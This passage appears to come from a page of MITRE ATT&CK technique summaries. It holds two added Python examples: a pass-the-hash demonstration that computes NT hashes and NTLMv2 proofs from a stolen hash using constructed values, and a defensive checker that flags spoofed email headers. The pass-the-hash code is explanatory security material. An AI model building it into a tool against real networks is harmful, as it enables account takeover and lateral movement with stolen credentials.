An adversary may revert changes made to a cloud instance after they have performed malicious activities in attempt to evade detection and remove evidence of …
T1542
Defense EvasionPre-OS Boot
Adversaries may abuse Pre-OS Boot mechanisms as a way to establish persistence on a system. During the booting process of a computer, firmware and various …
T1542.004
Defense EvasionROMMONkit
Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is …
T1542.005
Defense EvasionTFTP Boot
Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly …
T1548.006
Defense EvasionTCC Manipulation
Adversaries can manipulate or abuse the Transparency, Consent, & Control (TCC) service or database to grant malicious executables elevated permissions. TCC is a Privacy & …
T1550
Defense EvasionUse Alternate Authentication Material
Adversaries may use alternate authentication material, such as password hashes, Kerberos tickets, and application access tokens, in order to move laterally within an environment and …
T1550.001
Defense EvasionApplication Access Token
Adversaries may use stolen application access tokens to bypass the typical authentication process and access restricted accounts, information, or services on remote systems. These tokens …
T1550.002
Defense EvasionPass the Hash
Adversaries may “pass the hash” using stolen password hashes to move laterally within an environment, bypassing normal system access controls. Pass the hash (PtH) is …
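An added example of why T1550.002 works, written for this page and not taken from ATT&CK or any tool: the NT hash is MD4 over the UTF-16LE password, and the NTLMv2 proof a client presents is an HMAC-MD5 chain keyed by that hash, so a party holding only the hash computes exactly the same authenticator as the user who knows the password. MD4 is reimplemented below because many OpenSSL builds no longer expose it through `hashlib`; the server challenge, client blob, user name and domain are constructed values, not captured traffic.

```python
import hashlib
import hmac
import struct

_MASK = 0xFFFFFFFF


def _rotl(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & _MASK


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320), the hash behind the NT hash."""
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    # Per round: boolean function, message-word order, per-step shifts, additive constant.
    rounds = (
        (lambda x, y, z: (x & y) | (~x & z), range(16), (3, 7, 11, 19), 0),
        (lambda x, y, z: (x & y) | (x & z) | (y & z),
         [(i % 4) * 4 + i // 4 for i in range(16)], (3, 5, 9, 13), 0x5A827999),
        (lambda x, y, z: x ^ y ^ z,
         (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15), 0x6ED9EBA1),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        r = state[:]
        for fn, order, shifts, k in rounds:
            for i, word in enumerate(order):
                t = (-i) % 4  # registers are updated in the order a, d, c, b, a, ...
                a, b, c, d = r[t], r[(t + 1) % 4], r[(t + 2) % 4], r[(t + 3) % 4]
                r[t] = _rotl((a + fn(b, c, d) + x[word] + k) & _MASK, shifts[i % 4])
        state = [(s + v) & _MASK for s, v in zip(state, r)]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE(password)); unsalted, so it is a password equivalent."""
    return md4(password.encode("utf-16-le"))


def ntlmv2_hash(nthash: bytes, user: str, domain: str) -> bytes:
    return hmac.new(nthash, (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()


def ntlmv2_proof(nthash: bytes, user: str, domain: str,
                 server_challenge: bytes, client_blob: bytes) -> bytes:
    """NTProofStr of the NTLMv2 response: everything here derives from the NT hash alone."""
    return hmac.new(ntlmv2_hash(nthash, user, domain),
                    server_challenge + client_blob, hashlib.md5).digest()


# Constructed protocol values (not captured traffic): 8-byte server challenge and a
# client blob of the shape a workstation would build (version, timestamp, nonce, ...).
SERVER_CHALLENGE = bytes.fromhex("0123456789abcdef")
CLIENT_BLOB = (bytes.fromhex("0101000000000000") + b"\x00" * 8
               + bytes.fromhex("aabbccddeeff0011") + b"\x00" * 4)


def legit_client(password: str) -> bytes:
    """The real user: hashes the password, then answers the challenge."""
    return ntlmv2_proof(nt_hash(password), "alice", "CORP", SERVER_CHALLENGE, CLIENT_BLOB)


def pth_attacker(stolen_nt_hash_hex: str) -> bytes:
    """Pass the hash: never learns the password, replays the dumped hash instead."""
    return ntlmv2_proof(bytes.fromhex(stolen_nt_hash_hex), "alice", "CORP",
                        SERVER_CHALLENGE, CLIENT_BLOB)


if __name__ == "__main__":
    h = nt_hash("password").hex()
    print("NT hash       :", h)
    print("proofs equal  :", legit_client("password") == pth_attacker(h))
```

Because the server only ever checks the proof, nothing in the protocol distinguishes the two callers; the defensive levers are therefore about the hash's exposure (Credential Guard, the Protected Users group, not letting privileged accounts log on to workstations) and about spotting NTLM logons from hosts and accounts that should not be pairing, not about the authentication exchange itself.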
T1550.003
Defense EvasionPass the Ticket
Adversaries may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is …
T1550.004
Defense EvasionWeb Session Cookie
Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already …
T1553
Defense EvasionSubvert Trust Controls
Adversaries may undermine security controls that will either warn users of untrusted activity or prevent execution of untrusted programs. Operating systems and security products may …
T1553.001
Defense EvasionGatekeeper Bypass
Adversaries may modify file attributes and subvert Gatekeeper functionality to evade user prompts and execute untrusted programs. Gatekeeper is a set of technologies that act …
T1553.002
Defense EvasionCode Signing
Adversaries may create, acquire, or steal code signing materials to sign their malware or tools. Code signing provides a level of authenticity on a binary …
T1553.003
Defense EvasionSIP and Trust Provider Hijacking
Adversaries may tamper with SIP and trust provider components to mislead the operating system and application control tools when conducting signature validation checks. In user …
T1553.004
Defense EvasionInstall Root Certificate
Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in …
T1553.005
Defense EvasionMark-of-the-Web Bypass
Adversaries may abuse specific file formats to subvert Mark-of-the-Web (MOTW) controls. In Windows, when files are downloaded from the Internet, they are tagged with a …
T1553.006
Defense EvasionCode Signing Policy Modification
Adversaries may modify code signing policies to enable execution of unsigned or self-signed code. Code signing provides a level of authenticity on a program from …
T1562
Defense EvasionImpair Defenses
Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such …
T1562.001
Defense EvasionDisable or Modify Tools
Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security …
T1562.002
Defense EvasionDisable Windows Event Logging
Adversaries may disable Windows event logging to limit data that can be leveraged for detections and audits. Windows event logs record user and system activity …
T1562.003
Defense EvasionImpair Command History Logging
Adversaries may impair command history logging to hide commands they run on a compromised system. Various command interpreters keep track of the commands users type …
T1562.004
Defense EvasionDisable or Modify System Firewall
Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage. Changes could be disabling the entire mechanism as well as …
T1562.006
Defense EvasionIndicator Blocking
An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed. This could include maliciously redirecting(Citation: Microsoft Lamin …
T1562.007
Defense EvasionDisable or Modify Cloud Firewall
Adversaries may disable or modify a firewall within a cloud environment to bypass controls that limit access to cloud resources. Cloud firewalls are separate from …
T1562.008
Defense EvasionDisable or Modify Cloud Logs
An adversary may disable or modify cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. Cloud environments …
T1562.009
Defense EvasionSafe Mode Boot
Adversaries may abuse Windows safe mode to disable endpoint defenses. Safe mode starts up the Windows operating system with a limited set of drivers and …
T1562.010
Defense EvasionDowngrade Attack
Adversaries may downgrade or use a version of system features that may be outdated, vulnerable, and/or does not support updated security controls. Downgrade attacks typically …
T1562.011
Defense EvasionSpoof Security Alerting
Adversaries may spoof security alerting from tools, presenting false evidence to impair defenders’ awareness of malicious activity.(Citation: BlackBasta) Messages produced by defensive tools contain information …
T1562.012
Defense EvasionDisable or Modify Linux Audit System
Adversaries may disable or modify the Linux audit system to hide malicious activity and avoid detection. Linux admins use the Linux Audit system to track …
T1562.013
Defense EvasionDisable or Modify Network Device Firewall
Adversaries may disable network device-based firewall mechanisms entirely or add, delete, or modify particular rules in order to bypass controls limiting network usage. Modifying or …
T1564
Defense EvasionHide Artifacts
Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important …
T1564.001
Defense EvasionHidden Files and Directories
Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, …
T1564.002
Defense EvasionHidden Users
Adversaries may use hidden users to hide the presence of user accounts they create or modify. Administrators may want to hide users when there are …
T1564.003
Defense EvasionHidden Window
Adversaries may use hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when …
T1564.004
Defense EvasionNTFS File Attributes
Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection. Every New Technology File System (NTFS) formatted partition contains …
T1564.005
Defense EvasionHidden File System
Adversaries may use a hidden file system to conceal malicious activity from users and security tools. File systems provide a structure to store and access …
T1564.006
Defense EvasionRun Virtual Instance
Adversaries may carry out malicious operations using a virtual instance to avoid detection. A wide variety of virtualization technologies exist that allow for the emulation …
T1564.007
Defense EvasionVBA Stomping
Adversaries may hide malicious Visual Basic for Applications (VBA) payloads embedded within MS Office documents by replacing the VBA source code with benign data.(Citation: FireEye …
T1564.008
Defense EvasionEmail Hiding Rules
Adversaries may use email rules to hide inbound emails in a compromised user's mailbox. Many email clients allow users to create inbox rules for various …
T1564.009
Defense EvasionResource Forking
Adversaries may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications. A resource fork provides applications a structured …
T1564.010
Defense EvasionProcess Argument Spoofing
Adversaries may attempt to hide process command-line arguments by overwriting process memory. Process command-line arguments are stored in the process environment block (PEB), a data …
T1564.011
Defense EvasionIgnore Process Interrupts
Adversaries may evade defensive mechanisms by executing commands that hide from process interrupt signals. Many operating systems use signals to deliver messages to control process …
T1564.012
Defense EvasionFile/Path Exclusions
Adversaries may attempt to hide their file-based artifacts by writing them to specific folders or file names excluded from antivirus (AV) scanning and other defensive …
T1564.013
Defense EvasionBind Mounts
Adversaries may abuse bind mounts on file structures to hide their activity and artifacts from native utilities. A bind mount maps a directory or file …
T1564.014
Defense EvasionExtended Attributes
Adversaries may abuse extended attributes (xattrs) on macOS and Linux to hide their malicious data in order to evade detection. Extended attributes are key-value pairs …
T1578
Defense EvasionModify Cloud Compute Infrastructure
An adversary may attempt to modify a cloud account's compute service infrastructure to evade defenses. A modification to the compute service infrastructure can include the …
T1578.001
Defense EvasionCreate Snapshot
An adversary may create a snapshot or data backup within a cloud account to evade defenses. A snapshot is a point-in-time copy of an existing …
T1578.002
Defense EvasionCreate Cloud Instance
An adversary may create a new instance or virtual machine (VM) within the compute service of a cloud account to evade defenses. Creating a new …
T1578.003
Defense EvasionDelete Cloud Instance
An adversary may delete a cloud instance after they have performed malicious activities in an attempt to evade detection and remove evidence of their presence. …
T1578.004
Defense EvasionRevert Cloud Instance
An adversary may revert changes made to a cloud instance after they have performed malicious activities in attempt to evade detection and remove evidence of …
T1578.005
Defense EvasionModify Cloud Compute Configurations
Adversaries may modify settings that directly affect the size, locations, and resources available to cloud compute infrastructure in order to evade defenses. These settings may …
T1599
Defense EvasionNetwork Boundary Bridging
Adversaries may bridge network boundaries by compromising perimeter network devices or internal devices responsible for network segmentation. Breaching these devices may enable an adversary to …
T1599.001
Defense EvasionNetwork Address Translation Traversal
Adversaries may bridge network boundaries by modifying a network device’s Network Address Translation (NAT) configuration. Malicious modifications to NAT may enable an adversary to bypass …
T1600
Defense EvasionWeaken Encryption
Adversaries may compromise a network device’s encryption capability in order to bypass encryption that would otherwise protect data communications. (Citation: Cisco Synful Knock Evolution) Encryption …
T1600.001
Defense EvasionReduce Key Space
Adversaries may reduce the level of effort required to decrypt data transmitted over the network by reducing the cipher strength of encrypted communications.(Citation: Cisco Synful …
T1600.002
Defense EvasionDisable Crypto Hardware
Adversaries may disable a network device’s dedicated hardware encryption, which may enable them to leverage weaknesses in software encryption in order to reduce the effort involved …
T1601
Defense EvasionModify System Image
Adversaries may make changes to the operating system of embedded network devices to weaken defenses and provide new capabilities for themselves. On such devices, the …
T1601.001
Defense EvasionPatch System Image
Adversaries may modify the operating system of a network device to introduce new capabilities or weaken existing defenses.(Citation: Killing the myth of Cisco IOS rootkits) …
T1601.002
Defense EvasionDowngrade System Image
Adversaries may install an older version of the operating system of a network device to weaken security. Older operating system versions on network devices often …
T1610
Defense EvasionDeploy Container
Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute …
T1612
Defense EvasionBuild Image on Host
Adversaries may build a container image directly on a host to bypass defenses that monitor for the retrieval of malicious images from a public registry. …
T1620
Defense EvasionReflective Code Loading
Adversaries may reflectively load code into a process in order to conceal the execution of malicious payloads. Reflective loading involves allocating then executing payloads directly …
T1622
Defense EvasionDebugger Evasion
Adversaries may employ various means to detect and avoid debuggers. Debuggers are typically used by defenders to trace and/or analyze the execution of potential malware …
T1647
Defense EvasionPlist File Modification
Adversaries may modify property list files (plist files) to enable other malicious activity, while also potentially evading and bypassing system defenses. macOS applications use plist …
T1656
Defense EvasionImpersonation
Adversaries may impersonate a trusted person or organization in order to persuade and trick a target into performing some action on their behalf. For example, …
T1666
Defense EvasionModify Cloud Resource Hierarchy
Adversaries may attempt to modify hierarchical structures in infrastructure-as-a-service (IaaS) environments in order to evade defenses. IaaS environments often group resources into a hierarchy, enabling …
T1672
Defense EvasionEmail Spoofing
Adversaries may fake, or spoof, a sender’s identity by modifying the value of relevant email headers in order to establish contact with victims under false …
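An added example for T1672, not part of the ATT&CK entry: a check that runs on a message as the receiving MTA recorded it and compares the visible `From` domain with the envelope sender (`Return-Path`), the `Authentication-Results` verdicts for SPF, DKIM and DMARC, the DKIM signing domain, and any divergent `Reply-To`. Both messages are constructed (domains under `.invalid` and `.example`); the header format follows what common MTAs emit, but the exact `Authentication-Results` syntax varies by vendor, so adjust the regexes to your mail gateway.

```python
import re
from email import message_from_string
from email.utils import parseaddr
from typing import List, Tuple

_RESULT = re.compile(r"\b(spf|dkim|dmarc)=([a-z]+)", re.I)
_DKIM_DOMAIN = re.compile(r"header\.d=([\w.-]+)", re.I)


def _domain(header_value: str) -> str:
    _, addr = parseaddr(header_value or "")
    return addr.rsplit("@", 1)[1].lower() if "@" in addr else ""


def aligned(a: str, b: str) -> bool:
    """Relaxed DMARC-style alignment: equal, or one is a subdomain of the other."""
    return bool(a and b) and (a == b or a.endswith("." + b) or b.endswith("." + a))


def assess(raw_message: str) -> List[Tuple[str, str]]:
    """Returns (severity, reason) findings; an empty list means the identity claims line up."""
    msg = message_from_string(raw_message)
    from_dom = _domain(msg.get("From", ""))
    envelope_dom = _domain(msg.get("Return-Path", ""))
    reply_dom = _domain(msg.get("Reply-To", ""))
    auth = msg.get("Authentication-Results", "")
    results = {k.lower(): v.lower() for k, v in _RESULT.findall(auth)}
    m = _DKIM_DOMAIN.search(auth)
    dkim_dom = m.group(1).lower() if m else ""

    findings: List[Tuple[str, str]] = []
    if envelope_dom and not aligned(from_dom, envelope_dom):
        findings.append(("high", f"visible From domain {from_dom} is not aligned with envelope sender {envelope_dom}"))
    if results.get("spf") in ("fail", "softfail"):
        findings.append(("high", f"SPF {results['spf']} for the envelope sender"))
    if results.get("dkim") == "pass":
        if not aligned(from_dom, dkim_dom):
            findings.append(("medium", f"DKIM signature from {dkim_dom}, not from the From domain"))
    else:
        findings.append(("medium", "no passing DKIM signature"))
    if results.get("dmarc") == "fail":
        findings.append(("high", "DMARC evaluation failed for the From domain"))
    if reply_dom and not aligned(from_dom, reply_dom):
        findings.append(("medium", f"Reply-To domain {reply_dom} differs from From domain {from_dom}"))
    return findings


# Constructed messages (not real mail). SPOOFED forges the bank's From header;
# LEGIT is what a message genuinely sent by the bank would look like on arrival.
SPOOFED = """\
Return-Path: <bounce@bulk-sender.invalid>
Authentication-Results: mx.example.org; spf=fail smtp.mailfrom=bulk-sender.invalid;
 dkim=none; dmarc=fail header.from=bank.example
From: "Bank Security" <alerts@bank.example>
Reply-To: <support@bank-example-help.invalid>
To: alice@example.org
Subject: Action required on your account

Please verify your account.
"""

LEGIT = """\
Return-Path: <alerts@bank.example>
Authentication-Results: mx.example.org; spf=pass smtp.mailfrom=bank.example;
 dkim=pass header.d=bank.example; dmarc=pass header.from=bank.example
From: "Bank Security" <alerts@bank.example>
To: alice@example.org
Subject: Your statement is ready

Your statement is available.
"""

if __name__ == "__main__":
    for label, raw in (("spoofed", SPOOFED), ("legit", LEGIT)):
        print(label, assess(raw) or "no findings")
```

The `From` header is free text the sender controls, which is the whole technique; the only trustworthy inputs are the ones the receiving server added, so this check must run on server-side copies and never on headers a client forwarded.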
T1678
Defense EvasionDelay Execution
Adversaries may employ various time-based methods to evade detection and analysis. These techniques often exploit system clocks, delays, or timing mechanisms to obscure malicious activity, …
T1679
Defense EvasionSelective Exclusion
Adversaries may intentionally exclude certain files, folders, directories, file types, or system components from encryption or tampering during a ransomware or malicious payload execution. Some …
T1007
DiscoverySystem Service Discovery
Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands …
T1010
DiscoveryApplication Window Discovery
Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used.(Citation: Prevailion DarkWatchman 2021) …
T1012
DiscoveryQuery Registry
Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software. The Registry contains a significant amount of information …
T1016
DiscoverySystem Network Configuration Discovery
Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery …
T1016.001
DiscoveryInternet Connection Discovery
Adversaries may check for Internet connectivity on compromised systems. This may be performed during automated discovery and can be accomplished in numerous ways such as …
T1016.002
DiscoveryWi-Fi Discovery
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems. Adversaries may use Wi-Fi information as part of …
T1018
DiscoveryRemote System Discovery
Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used …
T1033
DiscoverySystem Owner/User Discovery
Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is …
T1046
DiscoveryNetwork Service Discovery
Adversaries may attempt to get a listing of services running on remote hosts and local network infrastructure devices, including those that may be vulnerable to …
T1049
DiscoverySystem Network Connections Discovery
Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by …
T1057
DiscoveryProcess Discovery
Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running …
T1063
DiscoverySecurity Software Discovery
Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on the system. This may include things …
T1069
DiscoveryPermission Groups Discovery
Adversaries may attempt to discover group and permission settings. This information can help adversaries determine which user accounts and groups are available, the membership of …
T1069.001
DiscoveryLocal Groups
Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist …
T1069.002
DiscoveryDomain Groups
Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which …
T1069.003
DiscoveryCloud Groups
Adversaries may attempt to find cloud groups and permission settings. The knowledge of cloud permission groups can help adversaries determine the particular roles of users …
T1082
DiscoverySystem Information Discovery
An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use …
T1083
DiscoveryFile and Directory Discovery
Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. …
T1087
DiscoveryAccount Discovery
Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can …
T1087.001
DiscoveryLocal Account
Adversaries may attempt to get a listing of local system accounts. This information can help adversaries determine which local accounts exist on a system to …
T1087.002
DiscoveryDomain Account
Adversaries may attempt to get a listing of domain accounts. This information can help adversaries determine which domain accounts exist to aid in follow-on behavior …
T1087.003
DiscoveryEmail Account
Adversaries may attempt to get a listing of email addresses and accounts. Adversaries may try to dump Exchange address lists such as global address lists …
T1087.004
DiscoveryCloud Account
Adversaries may attempt to get a listing of cloud accounts. Cloud accounts are those created and configured by an organization for use by users, remote …
T1120
DiscoveryPeripheral Device Discovery
Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.(Citation: Peripheral Discovery Linux)(Citation: Peripheral Discovery macOS) Peripheral devices …
T1124
DiscoverySystem Time Discovery
An adversary may gather the system time and/or time zone settings from a local or remote system. The system time is set and stored by …
T1135
DiscoveryNetwork Share Discovery
Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for …
T1201
DiscoveryPassword Policy Discovery
Adversaries may attempt to access detailed information about the password policy used within an enterprise network or cloud environment. Password policies are a way to …
T1217
DiscoveryBrowser Information Discovery
Adversaries may enumerate information about browsers to learn more about compromised environments. Data saved by browsers (such as bookmarks, accounts, and browsing history) may reveal …
T1482
DiscoveryDomain Trust Discovery
Adversaries may attempt to gather information on domain trust relationships that may be used to identify lateral movement opportunities in Windows multi-domain/forest environments. Domain trusts …
T1518
DiscoverySoftware Discovery
Adversaries may attempt to get a listing of software and software versions that are installed on a system or in a cloud environment. Adversaries may …
T1518.001
DiscoverySecurity Software Discovery
Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud …
T1518.002
DiscoveryBackup Software Discovery
Adversaries may attempt to get a listing of backup software or configurations that are installed on a system. Adversaries may use this information to shape …
T1526
DiscoveryCloud Service Discovery
An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service …
T1538
DiscoveryCloud Service Dashboard
An adversary may use a cloud service dashboard GUI with stolen credentials to gain useful information from an operational cloud environment, such as specific services, …
T1580
DiscoveryCloud Infrastructure Discovery
An adversary may attempt to discover infrastructure and resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, …
T1613
DiscoveryContainer and Resource Discovery
Adversaries may attempt to discover containers and other resources that are available within a containers environment. Other resources may include images, deployments, pods, nodes, and …
T1614
DiscoverySystem Location Discovery
Adversaries may gather information in an attempt to calculate the geographical location of a victim host. Adversaries may use the information from [System Location Discovery](https://attack.mitre.org/techniques/T1614) …
T1614.001
DiscoverySystem Language Discovery
Adversaries may attempt to gather information about the system language of a victim in order to infer the geographical location of that host. This information …
T1615
DiscoveryGroup Policy Discovery
Adversaries may gather information on Group Policy settings to identify paths for privilege escalation, security measures applied within a domain, and to discover patterns in …
T1619
DiscoveryCloud Storage Object Discovery
Adversaries may enumerate objects in cloud storage infrastructure. Adversaries may use this information during automated discovery to shape follow-on behaviors, including requesting all or specific …
T1652
DiscoveryDevice Driver Discovery
Adversaries may attempt to enumerate local device drivers on a victim host. Information about device drivers may highlight various insights that shape follow-on behaviors, such …
T1654
DiscoveryLog Enumeration
Adversaries may enumerate system and service logs to find useful data. These logs may highlight various types of valuable insights for an adversary, such as …
T1673
DiscoveryVirtual Machine Discovery
An adversary may attempt to enumerate running virtual machines (VMs) after gaining access to a host or hypervisor. For example, adversaries may enumerate a list …
T1680
DiscoveryLocal Storage Discovery
Adversaries may enumerate local drives, disks, and/or volumes and their attributes like total or free space and volume serial number. This can be done to …
T1028
Execution: Windows Remote Management
Windows Remote Management (WinRM) is the name of both a Windows service and a protocol that allows a user to interact with a remote system …
T1035
Execution: Service Execution
Adversaries may execute a binary, command, or script via a method that interacts with Windows services, such as the Service Control Manager. This can be …
T1047
Execution: Windows Management Instrumentation
Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is designed for programmers and is the infrastructure for management data …
T1053
Execution: Scheduled Task/Job
Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs …
T1053.001
Execution: At (Linux)
Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial, recurring, or future execution of malicious code. The [at](https://attack.mitre.org/software/S0110) command within Linux operating …
T1053.002
Execution: At
Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable …
T1053.003
Execution: Cron
Adversaries may abuse the <code>cron</code> utility to perform task scheduling for initial or recurring execution of malicious code.(Citation: 20 macOS Common Tools and Techniques) The …
T1053.004
Execution: Launchd
This technique is deprecated due to inaccurate usage. The report cited did not provide technical detail as to how the malware interacted directly with …
T1053.005
Execution: Scheduled Task
Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code. There are multiple ways to access …
T1053.006
Execution: Systemd Timers
Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension …
T1053.007
Execution: Container Orchestration Job
Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container …
T1059
Execution: Command and Scripting Interpreter
Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and …
T1059.001
Execution: PowerShell
Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.(Citation: …
T1059.002
Execution: AppleScript
Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called …
T1059.003
Execution: Windows Command Shell
Adversaries may abuse the Windows command shell for execution. The Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems. The Windows command …
T1059.004
Execution: Unix Shell
Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux, macOS, and ESXi systems, though many …
T1059.005
Execution: Visual Basic
Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component …
T1059.006
Execution: Python
Adversaries may abuse Python commands and scripts for execution. Python is a very popular scripting/programming language, with capabilities to perform many functions. Python can be …
T1059.007
Execution: JavaScript
Adversaries may abuse various implementations of JavaScript for execution. JavaScript (JS) is a platform-independent scripting language (compiled just-in-time at runtime) commonly associated with scripts in …
T1059.008
Execution: Network Device CLI
Adversaries may abuse scripting or built-in command line interpreters (CLI) on network devices to execute malicious commands and payloads. The CLI is the primary means …
T1059.009
Execution: Cloud API
Adversaries may abuse cloud APIs to execute malicious commands. APIs available in cloud environments provide various functionalities and are a feature-rich method for programmatic access …
T1059.010
Execution: AutoHotKey & AutoIT
Adversaries may execute commands and perform malicious tasks using AutoIT and AutoHotKey automation scripts. AutoIT and AutoHotkey (AHK) are scripting languages that enable users to …
T1059.011
Execution: Lua
Adversaries may abuse Lua commands and scripts for execution. Lua is a cross-platform scripting and programming language primarily designed for embedded use in applications. Lua …
T1059.012
Execution: Hypervisor CLI
Adversaries may abuse hypervisor command line interpreters (CLIs) to execute malicious commands. Hypervisor CLIs typically enable a wide variety of functionality for managing both the …
T1059.013
Execution: Container CLI/API
Adversaries may abuse built-in CLI tools or API calls to execute malicious commands in containerized environments. The Docker CLI is used for managing containers via …
T1061
Execution: Graphical User Interface
**This technique has been deprecated. Please use [Remote Services](https://attack.mitre.org/techniques/T1021) where appropriate.** The Graphical User Interface (GUI) is a common way to interact with an operating …
T1072
Execution: Software Deployment Tools
Adversaries may gain access to and use centralized software suites installed within an enterprise to execute commands and move laterally through the network. Configuration management …
T1086
Execution: PowerShell
PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform …
T1106
Execution: Native API
Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services …
T1129
Execution: Shared Modules
Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, …
T1153
Execution: Source
**This technique has been deprecated and should no longer be used.** The <code>source</code> command loads functions into the current shell or executes files in the …
T1154
Execution: Trap
The <code>trap</code> command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing …
T1155
Execution: AppleScript
macOS and OS X applications send AppleEvent messages to each other for interprocess communications (IPC). These messages can be easily scripted with AppleScript for local …
T1173
Execution: Dynamic Data Exchange
Windows Dynamic Data Exchange (DDE) is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between applications. Once a link is established, applications can …
T1177
Execution: LSASS Driver
The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority …
T1203
Execution: Exploitation for Client Execution
Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to …
T1204
Execution: User Execution
An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them …
T1204.001
Execution: Malicious Link
An adversary may rely upon a user clicking a malicious link in order to gain execution. Users may be subjected to social engineering to get …
T1204.002
Execution: Malicious File
An adversary may rely upon a user opening a malicious file in order to gain execution. Users may be subjected to social engineering to get …
T1204.003
Execution: Malicious Image
Adversaries may rely on a user running a malicious image to facilitate execution. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) …
T1204.004
Execution: Malicious Copy and Paste
An adversary may rely upon a user copying and pasting code in order to gain execution. Users may be subjected to social engineering to get …
T1204.005
Execution: Malicious Library
Adversaries may rely on a user installing a malicious library to facilitate execution. Threat actors may [Upload Malware](https://attack.mitre.org/techniques/T1608/001) to package managers such as NPM and …
T1559
Execution: Inter-Process Communication
Adversaries may abuse inter-process communication (IPC) mechanisms for local code or command execution. IPC is typically used by processes to share data, communicate with each …
T1559.001
Execution: Component Object Model
Adversaries may use the Windows Component Object Model (COM) for local code execution. COM is an inter-process communication (IPC) component of the native Windows application …
T1559.002
Execution: Dynamic Data Exchange
